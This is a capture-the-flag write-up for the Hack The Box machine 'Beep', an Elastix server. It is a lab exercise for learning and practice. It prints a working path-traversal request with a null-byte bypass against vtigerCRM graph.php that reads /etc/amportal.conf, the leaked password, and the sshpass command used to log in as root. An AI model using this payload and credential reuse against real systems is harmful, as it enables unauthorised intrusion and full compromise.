Post

Beep

Beep is an easy Linux box running Elastix where a path traversal flaw in vtigerCRM's graph.php leaks /etc/amportal.conf containing a plaintext password that is reused for root SSH, giving immediate full access.

Beep

Overview

Beep is an easy-difficulty Linux box running Elastix, a VoIP PBX distribution built on Asterisk and bundled third-party web applications including vtigerCRM. The attack chain is two steps: a path traversal flaw in vtigercrm/graph.php reads /etc/amportal.conf via a null-byte bypass, leaking a plaintext password; that same password is the root SSH password, so a single sshpass command delivers a root shell with both flags readable immediately.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

Real-Life dominates because path traversal plus credential reuse is a classic real-world finding; CVE is moderate reflecting a known public LFI; Custom Exploitation is zero since only wget and sshpass were needed.

Recon

PortServiceNotes
22SSHOpenSSH 4.3 (CentOS 5, legacy algorithms required)
25SMTPPostfix
80HTTPRedirects to HTTPS
110POP3Dovecot
111rpcbind 
143IMAPDovecot
443HTTPSElastix PBX login page
993IMAPS 
995POP3S 
3306MySQL 
5038AsteriskAMI management interface
10000WebminMiniserv 1.570
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p22,25,80,110,111,143,443,993,995,3306,5038,10000 -sC -sV -Pn 10.10.10.X

Port 443 is the most interesting — it presents an Elastix login page, which bundles vtigerCRM as an embedded application and is well-known for a PHP null-byte path traversal in an older graph.php endpoint.

Enumeration

Visiting https://10.10.10.X/ (ignoring the self-signed cert) confirms the Elastix splash screen. Navigating to /vtigercrm/ reveals the bundled vtigerCRM instance. The graph.php script in vtigerCRM accepts a current_language parameter that is passed directly to a file-open call without sanitising ../ sequences or null bytes — a textbook path traversal / LFI.

1
2
3
wget -q --no-check-certificate \
  "https://10.10.10.X/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action" \
  -O /tmp/amportal.txt

The %00 null byte terminates the string before PHP appends a .php extension (a behaviour fixed in PHP 5.3.4 — this box runs an older version). The response body is the raw contents of /etc/amportal.conf.

1
grep -iE "AMPDBPASS|AMPMGRPASS|ARI_ADMIN_PASSWORD" /tmp/amportal.txt | grep -v "^#"

All three password variables resolve to the same value: jEhdIekWmdjE. This is an exposure of sensitive information combined with plaintext credential storage in a world-readable config file.

Foothold

With the password in hand, attempt SSH as root. Because the box runs OpenSSH 4.3 on CentOS 5, modern clients refuse the connection unless legacy key-exchange and cipher options are explicitly enabled — without these flags the error looks identical to a wrong password:

1
2
3
4
5
sshpass -p 'jEhdIekWmdjE' ssh [email protected] \
  -o StrictHostKeyChecking=no \
  -o KexAlgorithms=+diffie-hellman-group1-sha1 \
  -o HostKeyAlgorithms=+ssh-rsa \
  -o Ciphers=+aes128-cbc,3des-cbc

The shell opens as uid=0(root)credential reuse between the Asterisk application config and the system root account gives immediate full access.

User flag

1
cat /home/fanis/user.txt   # HTB{...}

We land directly as root, so the user flag in /home/fanis/user.txt is readable from the same shell — no lateral movement required.

Privilege Escalation

None required. The LFI disclosed the root SSH password directly, and the SSH session authenticated as root (uid=0). Both flags are readable from the initial shell without any privilege escalation step.

Root flag

1
cat /root/root.txt   # HTB{...}

Full system compromise achieved in two commands — the LFI plus a single SSH login as root.

This post is licensed under CC BY 4.0 by the author.